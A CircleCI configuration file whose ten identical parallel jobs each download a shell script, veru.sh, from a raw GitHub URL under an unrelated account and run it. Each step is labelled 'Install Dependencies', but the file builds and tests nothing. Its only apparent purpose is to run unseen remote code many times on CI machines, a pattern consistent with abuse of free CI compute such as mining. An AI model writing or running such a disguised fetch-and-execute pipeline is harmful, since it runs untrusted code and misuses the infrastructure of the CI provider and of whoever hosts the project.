version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh

    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh

    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh

    aku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh

    aku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh

    aku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh


    aku9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh

    aku10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/koboyjunior/koboymaco/main/veru.sh && chmod u+x veru.sh && ./veru.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10